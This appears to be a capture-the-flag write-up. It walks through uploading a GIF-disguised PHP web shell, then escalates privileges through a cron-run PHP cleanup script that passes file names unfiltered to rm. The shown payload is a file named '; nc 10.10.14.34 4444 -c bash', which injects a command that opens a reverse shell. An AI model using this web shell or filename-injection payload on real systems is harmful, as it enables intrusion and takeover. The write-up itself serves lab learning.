Exploitation

Executing Code

GIF87a                                                                                                                                                                         
<?php system($_GET['cmd']); ?>

Intercepting and sending to repeater

Reverse Shell

Privilege Escalation

Found crontab

we can't write since we are not root or gully, can only read check_attack and crontab

crontab executes chech_attach.php every 3 minutes

Since we cannot write into these files, lets read the check_attack.php

bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

Analyzing this script it checks for files that aren't suppose to be in the uploads directory and deletes them, but pay attention to how it deletes the files, it appends them to the rm command without any filtering which makes it vulnerable to command injection

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

$path is the value of the upload directory

$path = '/var/www/html/uploads/';

$value is the suspicious file's name

by going into /var/www/html/uploads, we can create a file that holds the payload in its name. it we start the file with a ; semi colon it will en the rm command and execute whatever code we put.

demonstrates how file.txt is deleted after three minutes

touch '; nc 10.10.14.34 4444 -c bash'

since the script appends the name of the file, we create the above file with the name beggining with ; nc. the semi colon will end the command and execute all other code after it.